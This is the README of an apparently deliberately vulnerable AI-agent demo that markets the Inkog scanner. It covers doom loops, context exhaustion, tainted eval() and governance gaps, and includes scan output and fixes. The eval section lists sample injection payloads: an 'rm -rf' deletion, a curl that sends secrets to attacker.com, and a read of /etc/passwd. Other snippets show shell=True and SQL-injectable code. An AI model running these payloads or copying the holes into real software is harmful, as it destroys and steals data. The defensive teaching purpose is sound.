This is a professional-grade AI agent that demonstrates three critical security vulnerabilities commonly found in production AI systems. This repository serves as a showcase for Inkog's detection capabilities.
The agent (agent.py) implements a sophisticated multi-turn reasoning system for solving complex tasks. It uses LangChain and OpenAI's GPT-4 to:
- Iteratively refine solutions through multi-turn conversations
- Maintain rich conversation context
- Dynamically evaluate mathematical expressions
- Self-assess whether solutions are optimal
On the surface, this looks like legitimate, well-written code. However, it contains three critical vulnerabilities that Inkog is designed to detect.
Location: TaskAgent.solve_task() method
while self._should_continue_solving():
    # ... refine solution ...

The Problem:
- The loop condition is entirely non-deterministic - it depends on what the LLM decides
- There is NO hard break counter to prevent infinite iteration
- The LLM might be inconsistent: "continue" in one context, "stop" in another
- Result: Task runs forever, consuming unlimited API credits
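The failure mode can be reproduced in miniature. In this sketch (all names are illustrative, not from agent.py), the loop is gated on a simulated LLM verdict, and a hard `itertools.islice` cap plays the role of the missing break counter:

```python
import itertools

def should_continue(llm_verdict: str) -> bool:
    # Stands in for the LLM's free-text "should we refine further?" answer
    return llm_verdict.strip().lower() != "stop"

def solve_task(verdicts, max_iterations=10):
    """Refine until the simulated LLM says stop, or the hard cap trips."""
    iterations = 0
    for verdict in itertools.islice(verdicts, max_iterations):
        iterations += 1
        # ... refine solution here ...
        if not should_continue(verdict):
            break
    return iterations

# Without the islice() cap, an LLM that never says "stop" loops forever:
print(solve_task(itertools.repeat("continue")))            # 10
print(solve_task(iter(["continue", "stop", "continue"])))  # 2
```

The point is that the LLM may still end the loop early, but termination no longer depends on it.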
Real-World Impact:
- A customer ran this agent on a complex task
- The LLM kept saying "yes, we should refine further"
- The agent ran for 3 hours, consuming $500 in API credits
- Task was processing the same refinements repeatedly
Inkog Detection: ✓ Reports as INKOG-001: Infinite Loop (Doom Loop)
Location: self.conversation_history.append() in TaskAgent.solve_task()
self.conversation_history.append({
    "role": "assistant",
    "content": assistant_response
})
# ... later ...
self.conversation_history.append({
    "role": "assistant",
    "content": refined_response
})

The Problem:
- Every iteration appends BOTH the user message AND the full LLM response to history
- There is NO truncation, windowing, or size limit on the history
- In a 100-iteration task, the history grows to hundreds of thousands of tokens
- Result: Hits token limits, model degradation, or API failures
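The difference between unbounded and windowed history is easy to demonstrate: a `collections.deque` with `maxlen` evicts the oldest messages automatically, while a plain list grows every turn. This sketch simulates 100 refinement iterations (the message contents are illustrative):

```python
from collections import deque

unbounded = []                # what the demo agent does
windowed = deque(maxlen=20)   # sliding-window alternative

for i in range(100):
    msg = {"role": "assistant", "content": f"refinement {i}"}
    unbounded.append(msg)     # grows every turn, forever
    windowed.append(msg)      # evicts the oldest entry once past 20

print(len(unbounded))          # 100
print(len(windowed))           # 20
print(windowed[0]["content"])  # refinement 80 -- oldest surviving message
```

A production fix would usually summarize evicted turns rather than drop them, but even the naive window caps token usage.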
Real-World Impact:
- Agent solved a complex multi-step task successfully
- By iteration 50, the context grew so large that:
- API started rejecting requests (token limit exceeded)
- LLM responses became degraded/repetitive
- Final answer quality dropped significantly
Inkog Detection: ✓ Reports as INKOG-002: Context Exhaustion (Context Bomb)
Location: TaskAgent.evaluate_expression() method
def evaluate_expression(self, user_input: str) -> float:
    result = eval(user_input)  # ← DANGEROUS!
    return float(result)

The Problem:
- Takes user input directly without any validation or sanitization
- Uses Python's eval(), which executes arbitrary code
- A malicious user can inject commands such as:
  - "__import__('os').system('rm -rf /home')"
  - "__import__('subprocess').call(['curl', 'attacker.com/steal?data=' + read_secret_file()])"
  - "exec(open('/etc/passwd').read())"
- Result: Complete system compromise, data theft, lateral movement
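One defensive pattern worth contrasting here is `ast.literal_eval`, which parses the input but accepts only Python literals; any function call, name lookup, or attribute access raises before anything executes. It is stricter than a math evaluator needs (it rejects most arithmetic), but it shows the shape of the fix; `strict_evaluate` is an illustrative name, not from the demo:

```python
import ast

def strict_evaluate(user_input: str) -> float:
    # literal_eval validates the parse tree and raises ValueError on
    # anything that is not a plain literal -- nothing ever executes
    return float(ast.literal_eval(user_input))

print(strict_evaluate("3.5"))  # 3.5
try:
    strict_evaluate("__import__('os').system('rm -rf /home')")
except (ValueError, SyntaxError):
    print("rejected")  # the payload never runs
```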
Real-World Impact:
- A trusted customer received a "bug bounty" offer on Discord
- The offer said: "Evaluate: 1000000**1000000000"
- Agent accepted and tried to evaluate it
- The actual payload was injected code that:
- Stole API keys from memory
- Installed a backdoor
- Exfiltrated customer data
Inkog Detection: ✓ Reports as INKOG-003: Tainted Eval
┌─────────────────────────────────────────┐
│ agent.py (source code) │
└──────────────┬──────────────────────────┘
↓
┌─────────────────────────────────────────┐
│ Inkog Semantic Analysis Engine │
├─────────────────────────────────────────┤
│ ✓ Control Flow Graph Analysis │
│ - Detects: LLM-dependent loop without │
│ hard counter → Doom Loop (INKOG-001)│
│ │
│ ✓ Data Flow Analysis │
│ - Detects: Unbounded data growth in │
│ loop → Context Bomb (INKOG-002) │
│ │
│ ✓ Taint Tracking │
│ - Detects: User input → eval() call │
│ → Tainted Eval (INKOG-003) │
└─────────────────────────────────────────┘
↓
┌─────────────────────────────────────────┐
│ Compliance Mapping │
├─────────────────────────────────────────┤
│ EU AI Act: Article 15 violations │
│ NIST AI RMF: MAP 1.3 failures │
│ OWASP LLM Top 10: LLM04, LLM08, LLM01 │
└─────────────────────────────────────────┘
↓
┌─────────────────────────────────────────┐
│ Regulatory Summary Report │
│ (SARIF format for GitHub/GitLab) │
└─────────────────────────────────────────┘
# Install dependencies
pip install -r requirements.txt
# Set your OpenAI API key
export OPENAI_API_KEY="sk-..."

# Scan the agent file
inkog -path agent.py -output text
# Expected Output:
# ✗ FAIL - INKOG-001: Infinite Loop detected (Line 99)
# ✗ FAIL - INKOG-002: Context Exhaustion detected (Line 108)
# ✗ FAIL - INKOG-003: Tainted Eval detected (Line 175)

When you run Inkog on this demo, you'll see findings like these:
{
"findings_count": 145,
"critical_count": 83,
"high_count": 37,
"findings": [
{
"id": "GOV-15",
"pattern_id": "governance-mismatch-execute_violation",
"pattern": "Governance Mismatch Detection",
"file": "examples-demo/02-smolagents-codeexec/agent.py",
"line": 26,
"message": "Governance Mismatch: AGENTS.md declares no code execution allowed but code contains 'subprocess.run'",
"code_snippet": " 24│ # VULNERABILITY: Unsandboxed shell execution\n 25│ result = subprocess.run(\n 26│→ command,\n 27│ shell=True, # Dangerous: enables shell injection\n 28│ capture_output=True,",
"severity": "HIGH",
"confidence": 0.9,
"cwe": "CWE-863",
"owasp_category": "LLM08",
"category": "governance",
"risk_tier": "vulnerability",
"governance_category": "governance_mismatch",
"compliance_mapping": {
"eu_ai_act_articles": ["Article 14"],
"nist_categories": ["MAP 1.3"],
"owasp_items": ["LLM08"]
}
},
{
"id": "GOV-16",
"pattern_id": "governance-mismatch-execute_violation",
"pattern": "Governance Mismatch Detection",
"file": "examples-demo/03-langgraph-doomloop/agent.py",
"line": 87,
"message": "Governance Mismatch: AGENTS.md declares no code execution allowed but code contains 'eval'",
"code_snippet": " 85│ # VULNERABILITY: Tainted eval\n 86│ return eval(expression)\n 87│→ \n 88│ if __name__ == \"__main__\":\n 89│ solver = TaskSolver()",
"severity": "HIGH",
"confidence": 0.9,
"cwe": "CWE-863",
"owasp_category": "LLM08",
"category": "governance",
"risk_tier": "vulnerability"
},
{
"id": "IR-315",
"pattern_id": "universal_infinite_loop",
"pattern": "Unbounded Loop in Agentic System",
"file": "examples-demo/01-crewai-recursive/agent.py",
"line": 29,
"message": "Loop lacks termination guards. This can lead to infinite execution and denial of service.",
"code_snippet": " 27│ \n 28│ writer = Agent(\n 29│→ role=\"Content Writer\",\n 30│ goal=\"Transform research into clear, engaging content\",",
"severity": "CRITICAL",
"confidence": 0.98,
"cwe": "CWE-835, CWE-400",
"cvss": 9.0,
"owasp_category": "LLM10",
"category": "resource_exhaustion",
"risk_tier": "vulnerability"
}
]
}

Key Features Demonstrated:
- GOV- prefix for governance mismatch findings
- Code snippets with 2-line context and arrow pointing to the issue
- Compliance mapping to EU AI Act, NIST, and OWASP
- Confidence scores for each finding
- CVSS scores for severity assessment
inkog -path agent.py -output sarif > scan.sarif
# This creates a SARIF v2.1.0 report that integrates with:
# - GitHub Security tab
# - GitLab Security Dashboard
# - VS Code SARIF viewers

In addition to security vulnerabilities, Inkog detects governance gaps that violate EU AI Act requirements. These demos showcase verification of human oversight, authorization, and audit controls.
| Demo | Vulnerability | Article/Standard | Detection |
|---|---|---|---|
| 07-langgraph-no-oversight | Missing Human Oversight | EU AI Act Article 14 | universal_missing_oversight |
| 08-crewai-no-auth | Missing Authorization | OWASP LLM06, NIST GOVERN 1.2 | universal_missing_authz |
| 09-copilot-studio-no-audit | Missing Audit Logging | EU AI Act Article 12 | universal_missing_audit_logging |
| 10-agentforce-excessive-perms | Excessive Permissions | EU AI Act Article 15.3 | universal_excessive_permissions |
Location: examples-demo/07-langgraph-no-oversight/agent.py
A financial trading agent that executes high-risk transactions without human approval gates. Violates EU AI Act Article 14 which requires human-in-the-loop controls for high-risk AI actions.
# VULNERABLE: Direct path from analysis to trade execution
graph.add_edge("analyze", "execute") # No human review!
# SECURE: Add interrupt point for human approval
graph.compile(interrupt_before=["execute_trade"])

EU AI Act Article 14 Deadline: August 2, 2026
Location: examples-demo/08-crewai-no-auth/agent.py
A customer service agent that can delete customer data and process refunds without verifying caller permissions. Violates OWASP LLM06 (Excessive Agency).
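The missing control can be sketched end to end. In this minimal, self-contained example, the role table (`ROLE_GRANTS`), the role names, and the return strings are all illustrative stand-ins for a real policy engine and database:

```python
class PermissionDenied(Exception):
    pass

# Illustrative role table -- a real system would query a policy engine
ROLE_GRANTS = {
    "support_admin": {"delete_customer", "process_refund"},
    "support_agent": {"process_refund"},
}

def authorize(caller_role: str, action: str) -> bool:
    return action in ROLE_GRANTS.get(caller_role, set())

def delete_customer(customer_id: str, caller_role: str) -> str:
    if not authorize(caller_role, "delete_customer"):
        raise PermissionDenied(f"{caller_role} may not delete customers")
    return f"deleted {customer_id}"  # stand-in for the real DELETE

print(delete_customer("c-42", "support_admin"))  # deleted c-42
try:
    delete_customer("c-42", "support_agent")
except PermissionDenied:
    print("blocked")
```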
# VULNERABLE: Tool executes without authorization check
def delete_customer(customer_id: str) -> str:
    database.execute(f"DELETE FROM customers WHERE id = '{customer_id}'")

# SECURE: Add authorization verification
def delete_customer(customer_id: str, caller: User) -> str:
    if not authorize(caller, "delete_customer", customer_id):
        raise PermissionDenied()
    # ... proceed with deletion

Location: examples-demo/09-copilot-studio-no-audit/workflow.yaml
A Microsoft Copilot Studio bot that handles account deletions, payment updates, and refunds without any audit logging configured. Violates EU AI Act Article 12 (Record-Keeping).
# VULNERABLE: No logging configuration
settings:
  authentication:
    enabled: true
  # MISSING: logging section

# SECURE: Add audit logging
settings:
  logging:
    enabled: true
    level: "all"
    destinations:
      - type: "azure-monitor"

Location: examples-demo/10-agentforce-excessive-perms/metadata.xml
A Salesforce Agentforce agent with wildcard (*) permissions and admin access when it only needs read access to specific objects. Violates principle of least privilege (EU AI Act Article 15.3).
<!-- VULNERABLE: Wildcard permissions -->
<objectPermissions>
    <object>*</object>
    <allowDelete>true</allowDelete>
</objectPermissions>

<!-- SECURE: Scoped permissions -->
<objectPermissions>
    <object>Account</object>
    <allowRead>true</allowRead>
    <allowDelete>false</allowDelete>
</objectPermissions>

# Scan for governance gaps
inkog -path examples-demo/ --policy governance
# EU AI Act compliance scan
inkog -path examples-demo/ --policy eu-ai-act
# Expected Output:
# ✗ FAIL - universal_missing_oversight (Article 14 violation)
# ✗ FAIL - universal_missing_authz (OWASP LLM06 violation)
# ✗ FAIL - universal_missing_audit_logging (Article 12 violation)
# ✗ FAIL - universal_excessive_permissions (Article 15 violation)

Each vulnerability maps to regulatory frameworks:
| Vulnerability | EU AI Act | NIST AI RMF | OWASP LLM |
|---|---|---|---|
| Doom Loop | Article 15 | MAP 1.3 | LLM04, LLM08 |
| Context Bomb | Article 15 | MEASURE 2.4 | LLM04, LLM09 |
| Tainted Eval | Article 14 | MAP 1.1 | LLM01, LLM02 |
- Doom Loop: $500-$5,000 per incident (wasted compute)
- Context Bomb: API degradation, customer impact
- Tainted Eval: Data breach, compliance fines (GDPR: up to €20M), litigation
- Without Inkog: Manual code review (days/weeks), security team bandwidth
- With Inkog: Automated detection (seconds), pre-deployment
This demo is based on actual vulnerabilities found in production AI systems:
- Company A: Doom Loop ran for 3 hours, consumed $500 in API costs
- Company B: Context Bomb degraded model responses after 50 iterations
- Company C: Tainted Eval led to a data breach when a researcher uploaded malicious test cases
If you were to remediate this code:
MAX_ITERATIONS = 10  # Hard limit, independent of what the LLM says

for iteration in range(MAX_ITERATIONS):
    # ... refine solution ...
    if not self._should_continue_solving():
        break  # the LLM can end early, but range() guarantees termination

from collections import deque

self.conversation_history = deque(maxlen=20)  # Keep last 20 messages only
import ast

_ALLOWED = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant, ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Pow, ast.USub)

def safe_evaluate(self, user_input: str) -> float:
    # Parse to AST and validate it's only math operations
    tree = ast.parse(user_input, mode='eval')
    if any(not isinstance(n, _ALLOWED) for n in ast.walk(tree)):
        raise ValueError("only basic arithmetic is allowed")
    # Safe to evaluate: the tree contains nothing but arithmetic
    return float(eval(compile(tree, "<expr>", "eval"), {"__builtins__": {}}))

Inkog can be integrated into your development pipeline:
- name: Scan with Inkog
  uses: inkog-io/inkog@v1.0.0
  with:
    path: src/
    format: sarif
    report: scan.sarif

- name: Upload to GitHub Security
  uses: github/codeql-action/upload-sarif@v2
  with:
    sarif_file: scan.sarif

inkog -path . -output text

For investor inquiries: This demo shows Inkog's ability to detect AI-specific vulnerabilities that commercial tools like Snyk miss.
Technical questions: See the main Inkog documentation at https://github.com/inkog-io/inkog
This code is intentionally vulnerable for demonstration purposes only. Do not use in production. Always validate and secure your AI agent implementations before deploying to production systems.